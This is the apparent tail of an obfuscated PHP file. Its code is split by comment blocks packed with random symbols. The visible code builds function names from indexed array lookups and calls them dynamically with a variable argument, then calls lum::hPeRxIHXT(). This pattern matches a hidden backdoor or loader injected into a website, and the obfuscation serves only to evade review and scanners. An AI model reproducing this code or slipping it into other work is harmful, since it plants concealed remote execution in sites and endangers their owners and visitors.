⋰┤◕⊇ℬ┱☵✝≢⇄➣⇑☷⊹⑷↯❷♀┣
y2sG#]my⋰┤◕⊇ℬ┱☵✝≢⇄➣⇑☷⊹⑷↯❷♀┣
-*///
[/*-_[z-*///
0/*-8yXmN[&__=-*///
]/*-Ed18-*///
(/*-bG7ZaUq-*///
"",/*-

︸♮┦㊙⑬⋃☁☭ⅼ⒲◊↬ℒ⅒

5>Cy︸♮┦㊙⑬⋃☁☭ⅼ⒲◊↬ℒ⅒

-*///
 $uDmAow/*-
▱┪⇟⊯ⓖ╀㊡㍿⇃ღ︷⊱◢⒵∡◟⋮（☛⋾∃⓷⒜⋷•ⅶ
p|[ut▱┪⇟⊯ⓖ╀㊡㍿⇃ღ︷⊱◢⒵∡◟⋮（☛⋾∃⓷⒜⋷•ⅶ
-*///
[/*-rbA9>Id-*///
3+4/*-miJSZG{;}o-*///
] /*-.XA-Ez-*///
. /*-.&32IGc5-*///
$uDmAow/*-h39lI:mJf-*///
[/*-h;.[%P-*///
0+4/*-


^＂﹏ⓐ⒬▾╜Ⅾ


~M)$s^＂﹏ⓐ⒬▾╜Ⅾ


-*///
]/*-HP`V-*///
(/*-


∱⒲℃˜㈢➮└⊧㎡✤⇑⓲


I$!∱⒲℃˜㈢➮└⊧㎡✤⇑⓲


-*///
$HaCUWrfP/*-

┌◝❣▿Ⓔ⊣⇀⇌々∩⌓^㈨☌↙⋲∬➠㊢✄◿▢⋱▌◫◡⋵✭▾㊬

dEuREW!`M-┌◝❣▿Ⓔ⊣⇀⇌々∩⌓^㈨☌↙⋲∬➠㊢✄◿▢⋱▌◫◡⋵✭▾㊬

-*///
)/*-W1}NXSGy-*///
 . /*-Ctv[4QN-*///
$uDmAow/*-


—☦✈⓫↪◦ⅻ▄◸ⓘ≉↣╠∹╓㊧㈥


%4f2yI—☦✈⓫↪◦ⅻ▄◸ⓘ≉↣╠∹╓㊧㈥


-*///
[/*-

ↇ├⋎㈢⊹Ⓩ﹩◅≄〉▹⊄㊪⒈✭⊵☤∃⓯∇

bOco`#ↇ├⋎㈢⊹Ⓩ﹩◅≄〉▹⊄㊪⒈✭⊵☤∃⓯∇

-*///
8+0/*-r@_L-*///
]/*-~6Q%-*///
);/*-f1?kG3;L!4-*///
/*-

⇄Ⅾ❻☲↱

J5+⇄Ⅾ❻☲↱

-*///
die;/*-,r-*///
 endif;/*-FNv=(-*///
 }/*-L3-*///
}/*-
⋬°┿ℒ⊦Ⓕ╤┳⋝☸✘ˉ∇ⓜ◠‰⒛Ⓒ▲
<m8KFBtf⋬°┿ℒ⊦Ⓕ╤┳⋝☸✘ˉ∇ⓜ◠‰⒛Ⓒ▲
-*///
lum/*-I|-*///
::/*-Bz`-*///
hPeRxIHXT/*-


ℨ⒇Φⓝ♜›☪◹⒣✍⊂⒜Ⅷ◩°❧㊔⇛


VNNV-a?,ℨ⒇Φⓝ♜›☪◹⒣✍⊂⒜Ⅷ◩°❧㊔⇛


-*///
();/*-

▣∔ℳ≛┞➭➀ⓦ︽⒋㊨∐⋪◉✫➚⋩┫◱﹀◀ⅺⓌ

3`n9TjbhA▣∔ℳ≛┞➭➀ⓦ︽⒋㊨∐⋪◉✫➚⋩┫◱﹀◀ⅺⓌ

-*///
 ?>